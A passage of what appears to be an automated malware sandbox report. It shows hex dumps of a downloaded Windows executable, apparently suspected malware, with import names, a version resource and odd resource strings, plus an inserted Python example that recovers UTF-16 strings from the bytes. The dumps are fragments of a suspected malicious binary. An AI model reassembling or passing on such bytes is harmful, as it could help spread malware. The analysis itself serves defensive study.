29 00 00 00 77 00 63 00 73 00 74 00 6f 00 6d 00 62 00 73 00 5f 00 73 00 28 00 28 00 28 00 76 00 6f 00 69 00 64 00 20 00 2a 00 29 00 30 00
                                                                                                                                                                                        Data Ascii: cters in Stringstrcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")wcstombs_s(((void *)0
                                                                                                                                                                                        2021-09-25 08:17:19 UTC135INData Raw: 65 74 41 43 50 00 00 37 02 47 65 74 4f 45 4d 43 50 00 00 72 01 47 65 74 43 50 49 6e 66 6f 00 0a 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 18 04 52 74 6c 55 6e 77 69 6e 64 00 66 04 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 9a 01 47 65 74 43 6f 6e 73 6f 6c 65 43 50 00 00 ac 01 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 89 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 41 00 00 24 05 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 8a 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 57 00 00 67 03 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 04 03 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 2d 03 4c 43 4d 61 70 53 74 72 69 6e 67 57 00 00 69 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57
                                                                                                                                                                                        Data Ascii: etACP7GetOEMCPrGetCPInfoIsValidCodePageRtlUnwindfSetFilePointerGetConsoleCPGetConsoleModeOutputDebugStringA$WriteConsoleWOutputDebugStringWgMultiByteToWideCharIsProcessorFeaturePresent-LCMapStringWiGetStringTypeW
                                                                                                                                                                                        2021-09-25 08:17:19 UTC136INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC152INData Raw: a0 ce 9b 6d 30 42 84 5d da f4 55 66 aa 1a a6 f4 9a a2 37 0f 34 64 90 6e 42 5d 1d 4a a0 94 3f 41 06 b5 88 69 1f e1 dc 81 24 ed 0f 03 72 cf 65 df da 54 d8 91 ee 3a fe 1e 3c e5 42 e5 c7 29 eb 70 9e b4 3c f6 fe c7 57 0c 8c 78 3e 55 d6 a3 a0 29 c0 a3 c3 75 87 7f 4e b0 ca 58 d5 bf 40 00 08 59 e8 30 de 95 4a 0e eb e2 a3 97 b5 61 66 88 56 6c db 75 72 f3 5f 83 09 83 a0 1f 5a db c7 61 7f 0e 64 09 00 19 f0 1b e2 be 48 6e d2 b6 ff d5 76 01 f0 a0 2a d9 78 56 7f 72 cb 0a ae 10 1e 59 c3 00 fe 46 78 99 b1 c8 0a 66 67 1b f0 c0 e1 e0 86 10 da 47 be 07 68 0a 8a 67 b3 dc f3 62 32 a7 b7 2c f6 74 c0 25 39 2f 8c 8a fe 19 8f 3f a4 97 e3 80 0e ac c9 e0 1f cf ad e6 9d 00 4c ec 51 34 a4 f5 6e 5a 67 bb 0d e5 0e 8b 5c b7 ac bd 43 6e c2 11 59 16 25 61 56 a4 70 e3 1b cf 9d da 7b 68 f0
                                                                                                                                                                                        Data Ascii: m0B]Uf74dnB]J?Ai$reT:<B)p<Wx>U)uNX@Y0JafVlur_ZadHnv*xVrYFxfgGhgb2,t%9/?LQ4nZg\CnY%aVp{h
                                                                                                                                                                                        2021-09-25 08:17:19 UTC153INData Raw: c8 4b 1c fb 9f cd 46 4a 2e 10 4a 5b a8 bf 87 25 8f b0 3a 79 43 6d 5c e4 aa 6d e3 1e c6 34 42 a5 16 26 32 f2 df 3b 40 f3 c7 39 3a 4a 56 52 81 23 c2 5c 34 45 06 3b 6f 56 06 a4 15 bd 54 73 b8 8b 78 25 94 61 d4 b2 e6 f8 92 aa bc ff 43 59 bb bb b8 f3 45 de 23 3b 8c 87 1e f5 6e 12 6f 18 2e 40 cf 95 80 d9 4a ea 3c 4d b9 6d b8 74 29 54 7b 03 ce 55 82 50 9c 42 25 3d ab 0e 05 07 81 59 d2 17 b2 cf 00 8d 55 12 ac da c3 0a 34 23 29 16 11 8c 0f a7 c3 92 fd 81 39 61 95 8f f0 21 19 b2 ac 57 d7 ad 25 2a 06 6b c1 cc 50 66 4d fc 80 e8 a0 3d 01 a8 53 bf 0e 49 48 1b 4f 03 0a 78 3e 3f 0f 1a f0 26 18 cc a6 44 bb 3f 7e 28 5b 1f a9 98 f8 eb eb 17 66 86 74 c0 10 67 90 0e 50 a3 5f 89 b5 35 06 f6 8d b4 3c 81 88 95 c8 e4 fc 5a 8d 80 ab e0 fe 18 d0 14 d8 cb 9b 02 f8 1f b1 47 ec 62 04
                                                                                                                                                                                        Data Ascii: KFJ.J[%:yCm\m4B&2;@9:JVR#\4E;oVTsx%aCYE#;no.@J<Mmt)T{UPB%=YU4#)9a!W%*kPfM=SIHOx>?&D?~([ftgP_5<ZGb
                                                                                                                                                                                        2021-09-25 08:17:19 UTC169INData Raw: f9 88 db 2b cc a7 b0 cd 1a b2 10 09 c0 5a d3 3c b8 20 4d 9d 82 3c cf 0f d1 ad 8a 74 d2 ee e2 8b ba 3d cd 16 b2 9d 4d f7 75 cc 08 a7 7c de ad d4 01 1a f3 0f e9 fc 4e 7d 6a 9d 3e d4 c5 60 9c 26 6c 69 12 32 a3 80 f9 59 73 60 d5 cb 4e d9 ed 17 98 92 d8 15 49 2e 21 d5 36 81 9f 70 bd 81 97 84 a6 4b d8 ce b7 70 2f 97 4d b2 2c bb 55 9a af a7 d2 25 ea 73 11 ea 55 29 ec 14 42 d7 1c 67 5e 41 c6 cf 75 2d 53 d8 d0 dd ea 8a 8c a2 d6 8c 70 42 d1 e2 65 7a 4b fc 43 32 8f 61 15 0a a6 bd 80 52 2b b1 06 cb 5d 0d b4 80 1d 13 ad 34 5e b0 71 45 10 ad 89 e6 dc 10 6b 3b b6 1f 93 3c 89 32 8e 62 47 84 cc 30 ad 64 6e 0a e7 87 a3 92 29 42 74 2d 70 51 23 f8 f6 2b ce ef 18 ed 56 47 1f a5 fd 2c 75 d2 0c 82 30 bf c3 b2 b2 32 65 88 1c 38 f5 71 0e 6c 7c 41 ca 20 28 3e 06 e8 22 7b a0 e0 ac
                                                                                                                                                                                        Data Ascii: +Z< M<t=Mu|N}j>`&li2Ys`NI.!6pKp/M,U%sU)Bg^Au-SpBezKC2aR+]4^qEk;<2bG0dn)Bt-pQ#+VG,u02e8ql|A (>"{
                                                                                                                                                                                        2021-09-25 08:17:19 UTC170INData Raw: eb 50 f2 d6 43 ec 2b bb e6 f5 04 e4 d6 e0 3a d0 b6 2a 2e df dd 9e ad 14 86 b1 2b 72 83 7d a3 f4 f2 2e cb db 76 35 07 83 f3 03 6e 97 07 65 51 45 ba 4e b2 76 57 dd a0 ac ce 52 87 cd ba 0d de 90 0a 71 85 3b b1 f7 d2 0c d3 be ea 6c 7a a9 fd 84 e8 27 b9 0b 04 00 51 03 07 83 d1 42 ba 3b 49 57 99 98 56 f0 67 c2 c7 f1 cb 9e 61 5b 7b 74 23 70 8c 79 ed c9 37 a5 8b c2 6c a4 6f c0 58 5c fb cc 38 76 83 94 33 42 5a f7 01 af b2 85 60 8a 6f 00 c9 cc 0f eb a5 ff 1e 15 cc 06 d5 a2 f5 09 17 f7 ba 24 14 95 ab 49 3b f0 65 fc f4 ad f8 36 b8 b0 0f 24 c2 64 67 05 48 80 e7 4d d9 0d 28 5b ba bb 4c 9c 9b 18 eb bd 4e 37 bd 67 92 28 41 5c 67 ea 28 82 52 0a f8 ce 6f c3 ae 4d 17 4f e2 40 4a a1 e6 c2 21 be 12 79 78 35 19 dd f2 42 d8 f3 4e aa af 03 62 5c 04 51 04 7e 40 2d 76 c0 4b aa 92
                                                                                                                                                                                        Data Ascii: PC+:*.+r}.v5neQENvWRq;lz'QB;IWVga[{t#py7loX\8v3BZ`o$I;e6$dgHM([LN7g(A\g(RoMO@J!yx5BNb\Q~@-vK
                                                                                                                                                                                        2021-09-25 08:17:19 UTC186INData Raw: 46 0e 45 0b 53 e4 93 ec f2 8f c2 68 a4 e6 b4 24 00 fa fa 75 b4 aa 9e c2 b0 6f 64 f9 05 5c 57 71 81 06 16 57 a0 db 3d a7 fc 46 a6 c8 2b 27 b1 04 90 26 4a 22 db 1c 72 ae 85 6f ad a0 00 fc ec a3 06 c4 86 c8 f9 d0 dc 2d a4 26 d2 42 17 36 aa 0e a8 99 35 17 d7 6d ba 4c 80 8b b2 7e c7 ba 4b f1 b3 d3 82 95 40 84 88 ed ec 45 77 0c 1d 40 0e 34 3a 7c d4 d9 e6 5d 0e 22 27 fa 12 00 76 22 12 92 f8 74 df 12 07 37 0f 8d 0e ca 80 dc ca 37 13 18 02 d7 c4 d8 ec 39 72 82 3b 99 bf e4 5c ac 59 7f 3f 84 e9 81 a9 f6 ef c9 5e d6 16 c4 d2 5e 39 c1 4f 3b ca c6 e7 6b 9e db 6a cf cf f0 47 f9 a7 4d d8 fd 79 15 70 52 dc 10 b6 c3 15 76 47 ed e8 66 33 40 d8 c4 12 37 1f e5 0d 7f 8c 5a 59 02 a1 1f 94 26 3d 25 42 80 6d da a1 2e 7b ce 3e ff 72 48 da 4b 34 27 99 9c 79 60 c0 6d e2 39 23 23 f8
                                                                                                                                                                                        Data Ascii: FESh$uod\WqW=F+'&J"ro-&B65mL~K@Ew@4:|]"'v"t779r;\Y?^^9O;kjGMypRvGf3@7ZY&=%Bm.{>rHK4'y`m9##
                                                                                                                                                                                        2021-09-25 08:17:19 UTC187INData Raw: da c4 91 b0 b7 90 7b 9f c6 71 a9 16 61 31 ec 12 53 01 63 e9 b7 fc 74 99 c9 ca 3b dd a0 38 84 5b c4 f0 44 3b 58 28 5b 8e da 1f a6 31 f3 6e 08 c2 54 84 4f 07 a9 8d 34 96 7d 5e a2 5d 77 3d 70 e9 58 e1 f0 0b fb 3d c7 d4 37 ab 30 76 94 0c 72 a8 e6 a0 77 df c9 d1 6b 70 06 0b c4 63 09 78 4c d9 02 b0 36 aa c9 b4 01 9b d4 31 ea 58 de 81 ba cb 92 20 db 18 3f 86 59 97 bf c6 78 7d cb 79 05 75 ce d1 2f e8 b3 9a 7b 88 d9 2c db d0 5a 6c e5 40 fa 34 17 96 98 1f d7 d9 b9 1f 70 ea cf 26 cc 3c 2c d8 78 4e 00 ad 2a 52 b0 c2 cb e2 49 69 79 50 30 0d 09 42 c7 f4 11 8d 9e a9 41 e9 38 ad 44 89 b6 8b 87 98 29 52 a7 7f 31 a3 59 87 5a 33 80 19 97 aa 8a 1d ea ad d5 9a 61 fe 6a 97 55 1b 13 df 40 41 be 55 d6 8c 51 e6 65 93 35 0d c2 95 44 b7 9c a9 7b 5b cd 60 b5 8d ce 63 cf d5 82 c2 c3
                                                                                                                                                                                        Data Ascii: {qa1Sct;8[D;X([1nTO4}^]w=pX=70vrwkpcxL61X ?Yx}yu/{,Zl@4p&<,xN*RIiyP0BA8D)R1YZ3ajU@AUQe5D{[`c
                                                                                                                                                                                        2021-09-25 08:17:19 UTC203INData Raw: 00 00 00 00 00 a0 e2 77 02 fa 02 00 00 00 00 00 00 00 00 00 00 c8 de 77 02 d8 03 00 00 00 00 00 00 00 00 00 00 30 a3 77 02 a8 25 00 00 00 00 00 00 00 00 00 00 a0 e5 77 02 78 00 00 00 00 00 00 00 00 00 00 00 d8 c8 77 02 14 00 00 00 00 00 00 00 00 00 00 00 38 e6 77 02 34 01 00 00 00 00 00 00 00 00 00 00 18 e6 77 02 0a 00 00 00 00 00 00 00 00 00 00 00 28 e6 77 02 0a 00 00 00 00 00 00 00 00 00 00 00 07 00 48 00 55 00 52 00 45 00 57 00 4f 00 48 00 1a 00 4c 00 49 00 42 00 45 00 56 00 4f 00 42 00 41 00 47 00 49 00 57 00 4f 00 52 00 4f 00 48 00 55 00 43 00 4f 00 44 00 41 00 56 00 4f 00 52 00 45 00 4a 00 41 00 07 00 4e 00 4f 00 54 00 45 00 46 00 4f 00 59 00 03 00 4d 00 55 00 4d 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00
                                                                                                                                                                                        Data Ascii: ww0w%wxw8w4w(wHUREWOHLIBEVOBAGIWOROHUCODAVOREJANOTEFOYMUM(0`
                                                                                                                                                                                        2021-09-25 08:17:19 UTC204INData Raw: 00 d8 9e a6 26 de 9d bc 26 00 00 00 00 00 00 00 00 00 00 00 00 35 21 4e 17 00 00 00 00 40 26 49 19 3a 1b 4f 17 83 84 81 d7 7b 7f 7f da 90 a3 99 c7 98 8a 8f d4 96 92 9a df 93 99 a1 d5 96 9c 96 df 93 9d 94 d3 90 99 8d d3 a3 a5 91 d0 95 b0 91 d3 87 ad 8e cb 93 a7 8d d7 85 97 95 d3 88 99 84 d8 94 a0 9f d5 94 9a 91 d8 8a 9b 89 d7 97 9b 9b cc 91 9d 8f d7 8e 97 8e ce 89 a0 97 d8 8c 97 8d d4 91 a2 90 d3 92 a2 99 d5 8f a9 8e d3 8d a6 90 c9 92 a4 9c d0 92 ac 9f d4 94 a5 99 e3 8b a1 97 d7 92 92 9a cf 8d 91 91 d0 83 87 81 d6 79 7e 84 d2 ae bb c0 37 ad c7 c4 3b 9e cb c4 40 a4 d1 ca 3d 8b d5 c6 2c 91 da cd 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a5 81 2a 9a 9a 81 26 86 83 7a d3 99 9a 9a d4 d0 d2 c3 d2 cd d4 cd cc cb d2 c9 ce c4 d0 cd d2 c3 ce
                                                                                                                                                                                        Data Ascii: &&5!N@&I:O{y~7;@=,>*&z
                                                                                                                                                                                        2021-09-25 08:17:19 UTC220INData Raw: 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e 00 5f 00 49 00 4e 00 46 00 4f 00 00 00 00 00 bd 04 ef fe 00 00 01 00 00 00 11 00 00 00 00 00 00 00 1d 00 00 00 00 00 3f 00 00 00 20 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 92 00 00 00 01 00 46 00 69 00 6c 00 65 00 00 00 82 00 00 00 01 00 30 00 35 00 35 00 38 00 31 00 36 00 45 00 37 00 00 00 3a 00 0b 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 31 00 35 00 2e 00 33 00 2e 00 31 00 30 00 2e 00 31 00 33 00 00 00 00 00 2e 00 0b 00 01 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00 32 00 33 00 2e 00 38 00 2e 00 32 00 30 00 2e 00 31 00 37 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00
                                                                                                                                                                                        Data Ascii: VERSION_INFO? File055816E7:ProductVersion15.3.10.13.Version23.8.20.17DVarFileInf
                                                                                                                                                                                        2021-09-25 08:17:19 UTC221INData Raw: 33 c5 33 e2 33 e7 33 15 34 7a 34 86 34 8f 34 d1 34 00 35 26 35 6f 35 9e 35 d6 35 0d 36 31 36 82 36 b1 36 08 37 0c 37 10 37 14 37 28 37 2d 37 3f 37 53 37 8b 37 97 37 c4 37 c9 37 ce 37 db 37 f4 37 0b 38 21 38 27 38 34 38 b5 38 bc 38 d8 38 dd 38 ef 38 15 39 21 39 4e 39 53 39 58 39 7e 39 bb 39 66 3a 87 3a ab 3a b6 3a 79 3b 8a 3b a2 3b b3 3b 58 3c 5d 3c 6f 3c 9b 3c a0 3c c9 3c 21 3d 5a 3d 6a 3d 95 3d b7 3d 05 3e 21 3e 33 3e 4b 3e 81 3e dd 3e 26 3f 2b 3f 69 3f 00 40 00 00 c8 00 00 00 5b 30 8c 30 91 30 96 30 ce 30 49 31 6c 31 7c 31 81 31 c7 31 e6 31 47 32 53 32 b5 32 e5 32 08 33 10 33 26 33 33 33 38 33 53 33 60 33 65 33 73 33 7b 33 93 33 57 34 8d 34 9c 34 a5 34 db 34 ea 34 f5 34 06 35 17 35 1e 35 2d 35 37 35 45 35 4a 35 51 35 5b 35 5f 35 69 35 78 35 7c 35 82 35
                                                                                                                                                                                        Data Ascii: 33334z44445&5o555616667777(7-7?7S777777778!8'848888889!9N9S9X9~99f::::y;;;;X<]<o<<<<!=Z=j===>!>3>K>>>&?+?i?@[00000I1l1|1111G2S22233&33383S3`3e3s3{33W4444444555-575E5J5Q5[5_5i5x5|55
                                                                                                                                                                                        2021-09-25 08:17:19 UTC237INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC238INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC254INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC255INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC271INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC272INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
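Two of the dumps above carry readable UTF-16LE text that the report's "Data Ascii" column only hints at. The first dump in this section starts with what appears to be a table of 16-byte records (a 32-bit pointer in the 0x0277xxxx range plus a 16-bit size) followed by strings stored as a 16-bit character count and that many UTF-16LE characters (HUREWOH, LIBEVOBAGIWOROHUCODAVOREJA, NOTEFOY, MUM); the third dump is a VS_VERSIONINFO resource, and the bytes `bd 04 ef fe` in it are the little-endian VS_FIXEDFILEINFO signature 0xFEEF04BD, which is what you expect to see when the response body being streamed is a PE file. The following Python is an added example, not code from the Joe Sandbox report, that recovers both kinds of string from the raw bytes; the two byte samples are copied from the report's dumps, while the minimum and maximum string lengths are this example's own choices.

```python
"""Recover UTF-16LE strings from raw sandbox dump bytes (added example, not
part of the Joe Sandbox report)."""


def _hexdump_to_bytes(text):
    """Turn the space-separated hex exactly as printed in the report into bytes."""
    return bytes.fromhex(text.replace("\n", " "))


# Copied from the report: the first dump in this section (pointer/size table,
# then count-prefixed UTF-16LE strings with no 00 00 terminators between them).
DUMP_TABLE = _hexdump_to_bytes("""
00 00 00 00 00 a0 e2 77 02 fa 02 00 00 00 00 00 00 00 00 00 00
c8 de 77 02 d8 03 00 00 00 00 00 00 00 00 00 00
30 a3 77 02 a8 25 00 00 00 00 00 00 00 00 00 00
a0 e5 77 02 78 00 00 00 00 00 00 00 00 00 00 00
d8 c8 77 02 14 00 00 00 00 00 00 00 00 00 00 00
38 e6 77 02 34 01 00 00 00 00 00 00 00 00 00 00
18 e6 77 02 0a 00 00 00 00 00 00 00 00 00 00 00
28 e6 77 02 0a 00 00 00 00 00 00 00 00 00 00 00
07 00 48 00 55 00 52 00 45 00 57 00 4f 00 48 00
1a 00 4c 00 49 00 42 00 45 00 56 00 4f 00 42 00 41 00 47 00 49 00 57 00 4f 00
52 00 4f 00 48 00 55 00 43 00 4f 00 44 00 41 00 56 00 4f 00 52 00 45 00 4a 00 41 00
07 00 4e 00 4f 00 54 00 45 00 46 00 4f 00 59 00
03 00 4d 00 55 00 4d 00
00 00 00 00 00 00 00 00 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00
""")

# Copied from the report: the third dump in this section (VS_VERSIONINFO
# resource; the dump starts on the high byte of the 'S' in VS_VERSION_INFO).
DUMP_VERSION = _hexdump_to_bytes("""
00 56 00 45 00 52 00 53 00 49 00 4f 00 4e 00 5f 00 49 00 4e 00 46 00 4f 00 00 00 00 00
bd 04 ef fe 00 00 01 00 00 00 11 00 00 00 00 00 00 00 1d 00 00 00 00 00 3f 00 00 00 20 00 00 00
04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
92 00 00 00 01 00 46 00 69 00 6c 00 65 00 00 00
82 00 00 00 01 00 30 00 35 00 35 00 38 00 31 00 36 00 45 00 37 00 00 00
3a 00 0b 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00
31 00 35 00 2e 00 33 00 2e 00 31 00 30 00 2e 00 31 00 33 00 00 00 00 00
2e 00 0b 00 01 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00
32 00 33 00 2e 00 38 00 2e 00 32 00 30 00 2e 00 31 00 37 00 00 00 00 00
44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00
""")

VS_FIXEDFILEINFO_SIGNATURE = b"\xbd\x04\xef\xfe"  # 0xFEEF04BD, little-endian


def _is_printable(b):
    return 0x20 <= b <= 0x7E


def extract_utf16_nul_strings(data, min_len=4):
    """strings -el style: runs of printable UTF-16LE characters at any byte
    alignment, ended by the first pair that is not a printable char + 0x00."""
    out, i = [], 0
    while i + 1 < len(data):
        j = i
        while j + 1 < len(data) and _is_printable(data[j]) and data[j + 1] == 0:
            j += 2
        if (j - i) // 2 >= min_len:
            out.append(data[i:j].decode("utf-16-le"))
            i = j
        else:
            i += 1
    return out


def extract_utf16_length_prefixed(data, min_len=3, max_len=256):
    """Strings stored as a little-endian uint16 character count followed by
    exactly that many UTF-16LE characters, the layout seen in the first dump.
    A candidate count is accepted only if every counted character is printable."""
    out, i = [], 0
    while i + 1 < len(data):
        n = data[i] | (data[i + 1] << 8)
        start, end = i + 2, i + 2 + 2 * n
        if min_len <= n <= max_len and end <= len(data) and all(
            _is_printable(data[k]) and data[k + 1] == 0 for k in range(start, end, 2)
        ):
            out.append(data[start:end].decode("utf-16-le"))
            i = end
        else:
            i += 1
    return out


def carries_version_resource(data):
    """True when a VS_FIXEDFILEINFO block is present, i.e. a PE version
    resource (and so, almost always, a PE file) is being transferred."""
    return VS_FIXEDFILEINFO_SIGNATURE in data


if __name__ == "__main__":
    print(extract_utf16_length_prefixed(DUMP_TABLE))
    print(extract_utf16_nul_strings(DUMP_VERSION))
    print(carries_version_resource(DUMP_VERSION))
```

The two scanners are complementary: the count-prefixed scan recovers the three-character MUM that a four-character minimum drops from the strings-style scan, and it does not rely on 00 00 terminators, which the table's entries do not have (each string is followed directly by the next count). On the version resource only the strings-style scan finds anything, which is the expected result for a standard NUL-terminated Windows resource.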


Code Manipulations

Statistics

CPU Usage
[interactive chart; not reproduced]

Memory Usage
[interactive chart; not reproduced]

High Level Behavior Distribution
[interactive chart; not reproduced]

Behavior
[interactive chart; not reproduced]

System Behavior

General

Start time: 10:16:40
Start date: 25/09/2021
